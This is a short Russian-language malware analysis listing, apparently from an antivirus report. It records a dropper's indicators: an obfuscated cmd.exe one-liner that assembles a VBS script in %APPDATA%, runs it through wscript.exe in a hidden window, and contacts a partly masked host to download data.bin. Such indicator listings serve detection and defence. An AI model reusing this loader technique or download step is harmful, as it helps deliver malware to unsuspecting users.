Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Qv=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM XcAoTJ" "SuB Llc()" "UZzt9=2" "Dim EY9q, XhV" "For EY9q = 7 To 5000831" "XhV = Op + 64 + 45 + 27" "Next" "PlirAz=16" "ENd SuB" "Sub SDo...
- %APPDATA%\22124.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\22124.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Qv=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM XcAoTJ" "SuB Llc()" "UZzt9=2" "Dim EY9q, XhV" "For EY9q = 7 To 5000831" "XhV = Op + 64 + 45 + 27" "Next" "PlirAz=16" "ENd SuB" "Sub SDo...' (со скрытым окном)